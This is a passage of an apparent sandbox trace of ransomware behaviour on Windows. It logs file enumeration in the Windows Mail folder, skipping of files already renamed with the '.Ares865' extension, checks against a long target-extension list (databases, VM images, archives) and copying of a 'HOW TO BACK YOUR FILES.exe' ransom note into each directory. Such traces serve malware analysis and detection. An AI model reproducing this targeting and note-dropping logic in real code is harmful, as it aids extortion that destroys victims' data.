ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2ad0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMSDKNS.XML.Ares865", cAlternateFileName="WMSDKN~1.ARE")) returned 1 [0042.361] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.361] lstrcmpiW (lpString1="WMSDKNS.XML.Ares865", lpString2="aoldtz.exe") returned 1 [0042.361] lstrcpyW (in: lpString1=0x2e2e906, lpString2="WMSDKNS.XML.Ares865" | out: lpString1="WMSDKNS.XML.Ares865") returned="WMSDKNS.XML.Ares865" [0042.362] lstrlenW (lpString="WMSDKNS.XML.Ares865") returned 19 [0042.362] lstrlenW (lpString="Ares865") returned 7 [0042.362] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.362] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2ad0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMSDKNS.XML.Ares865", cAlternateFileName="WMSDKN~1.ARE")) returned 0 [0042.362] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.362] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0042.362] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0042.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.362] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned 76 [0042.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail" [0042.362] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.362] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.362] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.362] GetLastError () returned 0x0 [0042.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.363] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.363] CloseHandle (hObject=0x118) returned 1 [0042.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.363] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.363] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.363] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.363] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.363] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" | out: lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" [0042.363] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0042.363] lstrlenW (lpString="Ares865") returned 7 [0042.363] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0042.363] lstrlenW (lpString=".dll") returned 4 [0042.363] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".dll") returned 1 [0042.363] lstrlenW (lpString=".lnk") returned 4 [0042.363] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".lnk") returned 1 [0042.363] lstrlenW (lpString=".ini") returned 4 [0042.363] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".ini") returned 1 [0042.363] lstrlenW (lpString=".sys") returned 4 [0042.363] lstrcmpiW (lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpString2=".sys") returned 1 [0042.363] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0042.374] lstrlenW (lpString="bak") returned 3 [0042.374] lstrcmpiW (lpString1="unt", lpString2="bak") returned 1 [0042.374] lstrlenW (lpString="ba_") returned 3 [0042.374] lstrcmpiW (lpString1="unt", lpString2="ba_") returned 1 [0042.374] lstrlenW (lpString="dbb") returned 3 [0042.374] lstrcmpiW (lpString1="unt", lpString2="dbb") returned 1 [0042.374] lstrlenW (lpString="vmdk") returned 4 [0042.374] lstrcmpiW (lpString1="ount", lpString2="vmdk") returned -1 [0042.374] lstrlenW (lpString="rar") returned 3 [0042.374] lstrcmpiW (lpString1="unt", lpString2="rar") returned 1 [0042.374] lstrlenW (lpString="zip") returned 3 [0042.374] lstrcmpiW (lpString1="unt", lpString2="zip") returned -1 [0042.374] lstrlenW (lpString="tgz") returned 3 [0042.374] lstrcmpiW (lpString1="unt", lpString2="tgz") returned 1 [0042.374] lstrlenW (lpString="vbox") returned 4 [0042.374] lstrcmpiW (lpString1="ount", lpString2="vbox") returned -1 [0042.374] lstrlenW (lpString="vdi") returned 3 [0042.374] lstrcmpiW (lpString1="unt", lpString2="vdi") returned -1 [0042.375] lstrlenW (lpString="vhd") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="vhd") returned -1 [0042.375] lstrlenW (lpString="vhdx") returned 4 [0042.375] lstrcmpiW (lpString1="ount", lpString2="vhdx") returned -1 [0042.375] lstrlenW (lpString="avhd") returned 4 [0042.375] lstrcmpiW (lpString1="ount", lpString2="avhd") returned 1 [0042.375] lstrlenW (lpString="db") returned 2 [0042.375] lstrcmpiW (lpString1="nt", lpString2="db") returned 1 [0042.375] lstrlenW (lpString="db2") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="db2") returned 1 [0042.375] lstrlenW (lpString="db3") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="db3") returned 1 [0042.375] lstrlenW (lpString="dbf") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="dbf") returned 1 [0042.375] lstrlenW (lpString="mdf") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="mdf") returned 1 [0042.375] lstrlenW (lpString="mdb") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="mdb") returned 1 [0042.375] lstrlenW (lpString="sql") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="sql") returned 1 [0042.375] lstrlenW (lpString="sqlite") returned 6 [0042.375] lstrcmpiW (lpString1="ccount", lpString2="sqlite") returned -1 [0042.375] lstrlenW (lpString="sqlite3") returned 7 [0042.375] lstrcmpiW (lpString1="account", lpString2="sqlite3") returned -1 [0042.375] lstrlenW (lpString="sqlitedb") returned 8 [0042.375] lstrcmpiW (lpString1="eaccount", lpString2="sqlitedb") returned -1 [0042.375] lstrlenW (lpString="xml") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="xml") returned -1 [0042.375] lstrlenW (lpString="$er") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="$er") returned 1 [0042.375] lstrlenW (lpString="4dd") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="4dd") returned 1 [0042.375] lstrlenW (lpString="4dl") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="4dl") returned 1 [0042.375] lstrlenW (lpString="^^^") returned 3 [0042.375] lstrcmpiW (lpString1="unt", lpString2="^^^") returned 1 [0042.376] lstrlenW (lpString="abs") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="abs") returned 1 [0042.376] lstrlenW (lpString="abx") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="abx") returned 1 [0042.376] lstrlenW (lpString="accdb") returned 5 [0042.376] lstrcmpiW (lpString1="count", lpString2="accdb") returned 1 [0042.376] lstrlenW (lpString="accdc") returned 5 [0042.376] lstrcmpiW (lpString1="count", lpString2="accdc") returned 1 [0042.376] lstrlenW (lpString="accde") returned 5 [0042.376] lstrcmpiW (lpString1="count", lpString2="accde") returned 1 [0042.376] lstrlenW (lpString="accdr") returned 5 [0042.376] lstrcmpiW (lpString1="count", lpString2="accdr") returned 1 [0042.376] lstrlenW (lpString="accdt") returned 5 [0042.376] lstrcmpiW (lpString1="count", lpString2="accdt") returned 1 [0042.376] lstrlenW (lpString="accdw") returned 5 [0042.376] lstrcmpiW (lpString1="count", lpString2="accdw") returned 1 [0042.376] lstrlenW (lpString="accft") returned 5 [0042.376] lstrcmpiW (lpString1="count", lpString2="accft") returned 1 [0042.376] lstrlenW (lpString="adb") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0042.376] lstrlenW (lpString="adb") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="adb") returned 1 [0042.376] lstrlenW (lpString="ade") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="ade") returned 1 [0042.376] lstrlenW (lpString="adf") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="adf") returned 1 [0042.376] lstrlenW (lpString="adn") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="adn") returned 1 [0042.376] lstrlenW (lpString="adp") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="adp") returned 1 [0042.376] lstrlenW (lpString="alf") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="alf") returned 1 [0042.376] lstrlenW (lpString="ask") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="ask") returned 1 [0042.376] lstrlenW (lpString="btr") returned 3 [0042.376] lstrcmpiW (lpString1="unt", lpString2="btr") returned 1 [0042.377] lstrlenW (lpString="cat") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="cat") returned 1 [0042.377] lstrlenW (lpString="cdb") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="cdb") returned 1 [0042.377] lstrlenW (lpString="ckp") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="ckp") returned 1 [0042.377] lstrlenW (lpString="cma") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="cma") returned 1 [0042.377] lstrlenW (lpString="cpd") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="cpd") returned 1 [0042.377] lstrlenW (lpString="dacpac") returned 6 [0042.377] lstrcmpiW (lpString1="ccount", lpString2="dacpac") returned -1 [0042.377] lstrlenW (lpString="dad") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="dad") returned 1 [0042.377] lstrlenW (lpString="dadiagrams") returned 10 [0042.377] lstrcmpiW (lpString1=".oeaccount", lpString2="dadiagrams") returned -1 [0042.377] lstrlenW (lpString="daschema") returned 8 [0042.377] lstrcmpiW (lpString1="eaccount", lpString2="daschema") returned 1 [0042.377] lstrlenW (lpString="db-journal") returned 10 [0042.377] lstrcmpiW (lpString1=".oeaccount", lpString2="db-journal") returned -1 [0042.377] lstrlenW (lpString="db-shm") returned 6 [0042.377] lstrcmpiW (lpString1="ccount", lpString2="db-shm") returned -1 [0042.377] lstrlenW (lpString="db-wal") returned 6 [0042.377] lstrcmpiW (lpString1="ccount", lpString2="db-wal") returned -1 [0042.377] lstrlenW (lpString="dbc") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="dbc") returned 1 [0042.377] lstrlenW (lpString="dbs") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="dbs") returned 1 [0042.377] lstrlenW (lpString="dbt") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="dbt") returned 1 [0042.377] lstrlenW (lpString="dbv") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="dbv") returned 1 [0042.377] lstrlenW (lpString="dbx") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="dbx") returned 1 [0042.377] lstrlenW (lpString="dcb") returned 3 [0042.377] lstrcmpiW (lpString1="unt", lpString2="dcb") returned 1 [0042.378] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" | out: lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" [0042.378] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0042.378] lstrlenW (lpString="Ares865") returned 7 [0042.378] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0042.378] lstrlenW (lpString=".dll") returned 4 [0042.378] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".dll") returned 1 [0042.378] lstrlenW (lpString=".lnk") returned 4 [0042.378] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".lnk") returned 1 [0042.378] lstrlenW (lpString=".ini") returned 4 [0042.378] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".ini") returned 1 [0042.378] lstrlenW (lpString=".sys") returned 4 [0042.378] lstrcmpiW (lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpString2=".sys") returned 1 [0042.378] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0042.378] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" | out: lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" [0042.378] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0042.378] lstrlenW (lpString="Ares865") returned 7 [0042.378] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0042.378] lstrlenW (lpString=".dll") returned 4 [0042.378] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".dll") returned 1 [0042.378] lstrlenW (lpString=".lnk") returned 4 [0042.378] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".lnk") returned 1 [0042.378] lstrlenW (lpString=".ini") returned 4 [0042.378] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".ini") returned 1 [0042.378] lstrlenW (lpString=".sys") returned 4 [0042.378] lstrcmpiW (lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", lpString2=".sys") returned 1 [0042.378] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0042.378] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="Backup" | out: lpString1="Backup") returned="Backup" [0042.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa8) returned 0x2cbdb0 [0042.379] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.379] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7bc3a13, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0042.379] lstrcmpiW (lpString1="edb.chk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.379] lstrcmpiW (lpString1="edb.chk", lpString2="aoldtz.exe") returned 1 [0042.379] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="edb.chk" | out: lpString1="edb.chk") returned="edb.chk" [0042.379] lstrlenW (lpString="edb.chk") returned 7 [0042.379] lstrlenW (lpString="Ares865") returned 7 [0042.379] lstrlenW (lpString=".dll") returned 4 [0042.379] lstrcmpiW (lpString1="edb.chk", lpString2=".dll") returned 1 [0042.379] lstrlenW (lpString=".lnk") returned 4 [0042.379] lstrcmpiW (lpString1="edb.chk", lpString2=".lnk") returned 1 [0042.379] lstrlenW (lpString=".ini") returned 4 [0042.379] lstrcmpiW (lpString1="edb.chk", lpString2=".ini") returned 1 [0042.379] lstrlenW (lpString=".sys") returned 4 [0042.379] lstrcmpiW (lpString1="edb.chk", lpString2=".sys") returned 1 [0042.379] lstrlenW (lpString="edb.chk") returned 7 [0042.379] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="edb.log" | out: lpString1="edb.log") returned="edb.log" [0042.379] lstrlenW (lpString="edb.log") returned 7 [0042.379] lstrlenW (lpString="Ares865") returned 7 [0042.379] lstrlenW (lpString=".dll") returned 4 [0042.379] lstrcmpiW (lpString1="edb.log", lpString2=".dll") returned 1 [0042.379] lstrlenW (lpString=".lnk") returned 4 [0042.379] lstrcmpiW (lpString1="edb.log", lpString2=".lnk") returned 1 [0042.379] lstrlenW (lpString=".ini") returned 4 [0042.379] lstrcmpiW (lpString1="edb.log", lpString2=".ini") returned 1 [0042.379] lstrlenW (lpString=".sys") returned 4 [0042.379] lstrcmpiW (lpString1="edb.log", lpString2=".sys") returned 1 [0042.379] lstrlenW (lpString="edb.log") returned 7 [0042.380] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0042.380] lstrlenW (lpString="edb00001.log") returned 12 [0042.380] lstrlenW (lpString="Ares865") returned 7 [0042.380] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0042.380] lstrlenW (lpString=".dll") returned 4 [0042.380] lstrcmpiW (lpString1="edb00001.log", lpString2=".dll") returned 1 [0042.380] lstrlenW (lpString=".lnk") returned 4 [0042.380] lstrcmpiW (lpString1="edb00001.log", lpString2=".lnk") returned 1 [0042.380] lstrlenW (lpString=".ini") returned 4 [0042.380] lstrcmpiW (lpString1="edb00001.log", lpString2=".ini") returned 1 [0042.380] lstrlenW (lpString=".sys") returned 4 [0042.380] lstrcmpiW (lpString1="edb00001.log", lpString2=".sys") returned 1 [0042.380] lstrlenW (lpString="edb00001.log") returned 12 [0042.380] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="edbres00001.jrs" | out: lpString1="edbres00001.jrs") returned="edbres00001.jrs" [0042.380] lstrlenW (lpString="edbres00001.jrs") returned 15 [0042.380] lstrlenW (lpString="Ares865") returned 7 [0042.380] lstrcmpiW (lpString1="001.jrs", lpString2="Ares865") returned -1 [0042.380] lstrlenW (lpString=".dll") returned 4 [0042.380] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".dll") returned 1 [0042.380] lstrlenW (lpString=".lnk") returned 4 [0042.380] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".lnk") returned 1 [0042.380] lstrlenW (lpString=".ini") returned 4 [0042.380] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".ini") returned 1 [0042.380] lstrlenW (lpString=".sys") returned 4 [0042.380] lstrcmpiW (lpString1="edbres00001.jrs", lpString2=".sys") returned 1 [0042.380] lstrlenW (lpString="edbres00001.jrs") returned 15 [0042.380] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="edbres00002.jrs" | out: lpString1="edbres00002.jrs") returned="edbres00002.jrs" [0042.380] lstrlenW (lpString="edbres00002.jrs") returned 15 [0042.380] lstrlenW (lpString="Ares865") returned 7 [0042.380] lstrcmpiW (lpString1="002.jrs", lpString2="Ares865") returned -1 [0042.380] lstrlenW (lpString=".dll") returned 4 [0042.380] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".dll") returned 1 [0042.381] lstrlenW (lpString=".lnk") returned 4 [0042.381] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".lnk") returned 1 [0042.381] lstrlenW (lpString=".ini") returned 4 [0042.381] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".ini") returned 1 [0042.381] lstrlenW (lpString=".sys") returned 4 [0042.381] lstrcmpiW (lpString1="edbres00002.jrs", lpString2=".sys") returned 1 [0042.381] lstrlenW (lpString="edbres00002.jrs") returned 15 [0042.381] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="oeold.xml.Ares865" | out: lpString1="oeold.xml.Ares865") returned="oeold.xml.Ares865" [0042.381] lstrlenW (lpString="oeold.xml.Ares865") returned 17 [0042.381] lstrlenW (lpString="Ares865") returned 7 [0042.381] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.381] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0042.381] lstrcmpiW (lpString1="Stationery", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.381] lstrcmpiW (lpString1="Stationery", lpString2="aoldtz.exe") returned 1 [0042.381] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="Stationery" | out: lpString1="Stationery") returned="Stationery" [0042.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0042.381] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2cbe60 [0042.381] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0042.381] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7b05332, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0042.381] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.381] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="aoldtz.exe") returned 1 [0042.381] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0042.381] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0042.381] lstrlenW (lpString="Ares865") returned 7 [0042.381] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0042.381] lstrlenW (lpString=".dll") returned 4 [0042.381] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".dll") returned 1 [0042.381] lstrlenW (lpString=".lnk") returned 4 [0042.381] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".lnk") returned 1 [0042.381] lstrlenW (lpString=".ini") returned 4 [0042.381] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".ini") returned 1 [0042.381] lstrlenW (lpString=".sys") returned 4 [0042.382] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".sys") returned 1 [0042.382] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0042.382] lstrcpyW (in: lpString1=0x2e2e8fa, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") returned="WindowsMail.pat" [0042.382] lstrlenW (lpString="WindowsMail.pat") returned 15 [0042.382] lstrlenW (lpString="Ares865") returned 7 [0042.382] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0042.382] lstrlenW (lpString=".dll") returned 4 [0042.382] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".dll") returned 1 [0042.382] lstrlenW (lpString=".lnk") returned 4 [0042.382] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".lnk") returned 1 [0042.382] lstrlenW (lpString=".ini") returned 4 [0042.382] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".ini") returned 1 [0042.382] lstrlenW (lpString=".sys") returned 4 [0042.382] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".sys") returned 1 [0042.382] lstrlenW (lpString="WindowsMail.pat") returned 15 [0042.382] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe60 | out: hHeap=0x2b0000) returned 1 [0042.382] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0042.382] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned 87 [0042.382] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.382] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.382] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your 